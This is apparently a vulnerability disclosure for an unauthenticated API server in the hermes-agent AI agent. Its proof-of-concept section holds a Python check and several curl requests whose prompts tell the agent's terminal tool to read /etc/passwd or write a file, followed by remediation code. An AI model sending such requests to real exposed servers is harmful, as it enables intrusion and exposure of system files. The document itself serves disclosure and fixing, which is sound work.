# Vulnerability Summary: Hermes-Agent API Server Unauthenticated Remote Code Execution

## Vulnerability Overview

**Title**: [Bug]: Unauthenticated Remote Code Execution via API Server #6439

**Product**: hermes-agent (Version 0.8.0)

**Severity**: Critical (CVSS 9.8)

**Core Issue**: When `API_SERVER_KEY` is not configured (defaulting to empty), the API server completely disables authentication. If the bind address is modified to `0.0.0.0` (allowing network access), any unauthenticated network client can send arbitrary prompts to the Agent, leveraging built-in terminal tools to execute arbitrary OS commands.

## Impact Scope

* **Confidentiality**: Full access to Agent capabilities (reading files, querying databases, accessing APIs).
* **Integrity**: Ability to create/modify/delete cron tasks and write files via Agent tools.
* **Availability**: Exhaustion of LLM API quotas, creation of resource-intensive tasks.
* **Attack Vector**: Network (requires bind address to be non-localhost).
* **Affected Code**: `gateway/platforms/api_server.py` (Lines 361-380, 296-298).

## Remediation

1. **Startup Check**: When starting the server, if the bind address is not `127.0.0.1` and `API_SERVER_KEY` is not set, a `ValueError` should be raised to prevent startup.
2. **Default Key**: Consider automatically generating a random API key upon first startup if no key is configured.

## Proof of Concept (POC) Code

### 1. Automated Verification Script (Python)

```python
#!/usr/bin/env python3
"""POC: VULN-003 - API Server Default No Authentication"""
import sys
sys.path.insert(0, ".")

from gateway.platforms.api_server import APIServerAdapter, DEFAULT_HOST, DEFAULT_PORT

# Simulate default configuration (no api key)
adapter = APIServerAdapter.__new__(APIServerAdapter)
adapter._api_key = ""  # Default: empty string

# Create a fake request with no auth header
class FakeRequest:
    headers = {}

# Test authentication
result = adapter._check_auth(FakeRequest())

print(f"Default host: {DEFAULT_HOST}")
print(f"Default port: {DEFAULT_PORT}")
print(f"API key configured: {repr(adapter._api_key)}")
print(f"Auth check result: {result}")
print()

if result is None:
    print("[+] CONFIRMED: All requests bypass authentication when API_SERVER_KEY is empty")
    print()
    print("[-] Attack scenario:")
    print(" 1. Admin sets API_SERVER_HOST=0.0.0.0 to allow network access")
    print(" 2. Admin forgets to set API_SERVER_KEY")
    print(" 3. No warning is emitted at startup")
    print(" 4. Any client can now:")
    print()
    print(" curl -s -X POST http://target:8642/v1/chat/completions \\")
    print(" -H 'Content-Type: application/json' \\")
    print(" -d '{\"model\":\"hermes-agent\",\"messages\":[{\"role\":\"user\",\"content\":\"\\nrun: cat /etc/passwd\"}]}'")
    print()
```

### 2. Remote Code Execution Exploit (curl)

```bash
curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to execute this exact command: cat /etc/passwd"}]}'
```

### 3. Sensitive File Reading Exploit (curl)

```bash
curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: head -5 /etc/passwd"}]}'
```

### 4. Arbitrary File Writing Exploit (curl)

```bash
curl -s -X POST http://127.0.0.1:8642/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{"model":"hermes-agent","messages":[{"role":"user","content":"Use the terminal tool to run: echo VULN003_REPROOF > /tmp/vuln003_remote_proof"}]}'
```
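
The two options in the Remediation section, sketched as an added example; this is not hermes-agent's code. The function names `is_loopback`, `resolve_api_key` and `check_bearer` are hypothetical, the `Authorization: Bearer` scheme is an assumption, and the check is widened from the literal `127.0.0.1` to any loopback address.

```python
import hmac
import ipaddress
import secrets


def is_loopback(host: str) -> bool:
    """True only for bind addresses that are not reachable from the network."""
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback  # 127.0.0.0/8 and ::1
    except ValueError:
        # Empty or unparseable host values are treated as network-reachable.
        return False


def resolve_api_key(host: str, configured_key: str, autogenerate: bool = False) -> str:
    """Return the key the server must enforce, or raise before the socket binds.

    Remediation 1: non-loopback bind with an empty key raises ValueError.
    Remediation 2: with autogenerate=True a random key is created instead.
    """
    key = (configured_key or "").strip()
    if key:
        return key
    if is_loopback(host):
        return ""  # local-only bind keeps the existing no-key behaviour
    if autogenerate:
        return secrets.token_urlsafe(32)  # must be shown to the operator once
    raise ValueError(
        f"API_SERVER_KEY is empty and bind address {host!r} is not loopback; "
        "refusing to start without authentication"
    )


def check_bearer(headers: dict, api_key: str) -> bool:
    """Constant-time header check (Bearer scheme assumed for this sketch)."""
    if not api_key:
        return True  # only reachable when resolve_api_key allowed a loopback bind
    supplied = headers.get("Authorization", "")
    return hmac.compare_digest(supplied.encode(), f"Bearer {api_key}".encode())
```

Calling `resolve_api_key` with the values of `API_SERVER_HOST` and `API_SERVER_KEY` before the listener is created turns the silent misconfiguration from the attack scenario into a startup failure.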